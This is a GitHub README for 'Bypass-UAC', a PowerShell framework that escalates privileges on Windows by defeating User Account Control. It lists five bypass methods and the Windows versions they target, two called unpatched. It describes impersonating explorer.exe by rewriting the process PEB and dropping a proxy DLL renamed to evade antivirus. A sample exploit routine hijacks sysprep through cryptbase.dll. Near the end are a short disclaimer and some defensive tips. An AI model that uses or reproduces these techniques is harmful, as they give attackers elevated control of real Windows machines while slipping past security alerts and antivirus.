Switch branches/tags
Nothing to show
Find file History
Latest commit a281d3c Nov 1, 2016
Failed to load latest commit information.
FileOperations Bypass-UAC Sep 17, 2016
Yamabiko Bypass-UAC Sep 17, 2016
images +Win10-32 Image Sep 19, 2016
Bypass-UAC.ps1 +UacMethodNetOle32 Oct 17, 2016
README.md README Update Nov 1, 2016



Bypass-UAC provides a framework to perform UAC bypasses based on auto elevating IFileOperation COM object method calls. This is not a new technique, traditionally, this is accomplished by injecting a DLL into "explorer.exe". This is not desirable because injecting into explorer may trigger security alerts and working with unmanaged DLL's makes for an inflexible work-flow.

To get around this, Bypass-UAC implements a function which rewrites PowerShell's PEB to give it the appearance of "explorer.exe". This provides the same effect because COM objects exclusively rely on Windows's Process Status API (PSAPI) which reads the process PEB.


Bypass-UAC is self-contained and does not have any dependencies, bar a requirement that the target have PowerShell v2.


  • UacMethodSysprep: Original technique by Leo Davidson (sysprep -> cryptbase.dll)
    • Targets: x32/x64 Windows 7 & 8
  • ucmDismMethod: Hybrid method (PkgMgr -> DISM -> dismcore.dll)
    • Targets: x64 Win7+ (currently unpatched)
  • UacMethodMMC2: Hybrid method (mmc -> rsop.msc -> wbemcomn.dll)
    • Targets: x64 Win7+ (currently unpatched)
  • UacMethodTcmsetup: Hybrid method (tcmsetup -> tcmsetup.exe.local -> comctl32.dll)
    • Targets: x32/x64 Win7+ (UAC "0day" ¯_(ツ)_/¯)
  • UacMethodNetOle32: Hybrid method (mmc some.msc -> Microsoft.NET\Framework[64]..\ole32.dll)
    • Targets: x32/x64 Win7+ (UAC "0day" ¯_(ツ)_/¯)

Sample Output

Win 7 Pro


Win 10 Pro




By @mattifestation, allows you to easily define in-memory enums, structs, and Win32 functions. This is necessary because it allows PowerShell to use the Windows API without compiling c# at runtime. Doing that is ok most of the time but it writes temporary files to disk and won't work if csc is blacklisted.


A modified version of Masquerade-PEB, changed to use PSReflect. This function overwrites PowerShell's PEB to impersonate "explorer.exe".


Load a .NET dll into memory which exposes an IFileOperation COM object interface to PowerShell. This is based on work done by Stephen Toub, published in the December 2007 MSDN magazine (I added the pages in the images folder for reference). Further details available in the FileOperations folder.

PS C:\Users\b33f> $IFileOperation |Get-Member
    TypeName: FileOperation.FileOperation
 Name              MemberType Definition
 ----              ---------- ----------
 CopyItem          Method     void CopyItem(string source, string destination, string newName)
 DeleteItem        Method     void DeleteItem(string source)
 Dispose           Method     void Dispose(), void IDisposable.Dispose()
 Equals            Method     bool Equals(System.Object obj)
 GetHashCode       Method     int GetHashCode()
 GetType           Method     type GetType()
 MoveItem          Method     void MoveItem(string source, string destination, string newName)
 NewItem           Method     void NewItem(string folderName, string name, System.IO.FileAttributes attrs)
 PerformOperations Method     void PerformOperations()
 RenameItem        Method     void RenameItem(string source, string newName)
 ToString          Method     string ToString()


Bootstrap function which writes an x32/x64 bit proxy dll to disk (Yamabiko). This dll is based on fubuki from @hfiref0x's UACME project. Mostly I stripped out the redundant functionality and did some minor renaming for AV evasion. Further details available in the Yamabiko folder.


Currently there are five methods in Bypass-UAC, I will add more gradually but it would be awesome if people want to contribute. It is really easy to add a new method, provided you need an elevated file copy/move/rename or folder creation. A sample method can be seen below for reference.

    # Original Leo Davidson sysprep method
    # Works on everything pre 8.1
    if ($OSMajorMinor -ge 6.3) {
        echo "[!] Your OS does not support this method!`n"

    # Impersonate explorer.exe
    echo "`n[!] Impersonating explorer.exe!"
    Masquerade-PEB -BinPath "C:\Windows\explorer.exe"

    if ($DllPath) {
        echo "[>] Using custom proxy dll.."
        echo "[+] Dll path: $DllPath"
    } else {
        # Write Yamabiko.dll to disk
        echo "[>] Dropping proxy dll.."

    # Expose IFileOperation COM object

    # Exploit logic
    echo "[>] Performing elevated IFileOperation::MoveItem operation.."
    $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\System32\sysprep\'), "cryptbase.dll")
    echo "`n[?] Executing sysprep.."
    IEX $($env:SystemRoot + '\System32\sysprep\sysprep.exe')

    # Clean-up
    echo "[!] UAC artifact: $($env:SystemRoot + '\System32\sysprep\cryptbase.dll')`n"

Similarly, using EXPORTSTOC++ you can easily copy/paste exports into Yamabiko to target new binaries!


This project is for authorized use only, that goes without saying, I don't take responsibility for foolish people doing bad things!

Protect Yourself

  • Don't provide users with local Administrator rights.
  • Change the default UAC setting to "Always notify me and wait for my response" & require users to enter their password.
  • Remember Microsoft's official position is that UAC is not a security feature!